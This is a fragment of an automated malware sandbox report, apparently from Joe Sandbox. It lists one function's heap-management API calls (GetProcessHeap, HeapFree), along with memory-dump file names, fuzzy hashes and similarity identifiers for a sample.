                • Instruction Fuzzy Hash: C5C08C30200A0C97CF0859D8E892B2A33DD9B80300F80842CBE0C8F745C9B2DD8887E8
                Function 00CD49E0 Relevance: 5.0, APIs: 4, Instructions: 30memoryCOMMON
                Download Yara Rule
                APIs
                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00CD4F93), ref: 00CD4A00
                • HeapFree.KERNEL32(00000000), ref: 00CD4A07
                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00CD4F93), ref: 00CD4A20
                • HeapFree.KERNEL32(00000000), ref: 00CD4A27
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Heap$FreeProcess
                • String ID:
                • API String ID: 3859560861-0
                • Opcode ID: e0ff0c36da886d4d32acbc636506a26ec4b8bb4ee6168aa68d8cd1b21552d6e9
                • Instruction ID: 68c1e4715af2abeff2ae5102a3fbd97849c64f9e1d6e8b413b2006b6394f0f8c
                • Opcode Fuzzy Hash: e0ff0c36da886d4d32acbc636506a26ec4b8bb4ee6168aa68d8cd1b21552d6e9
                • Instruction Fuzzy Hash: 2EF03A39A00360EBD7289F50EC48BA63769BB48742F54C109AA01D7368CF34D843DBB4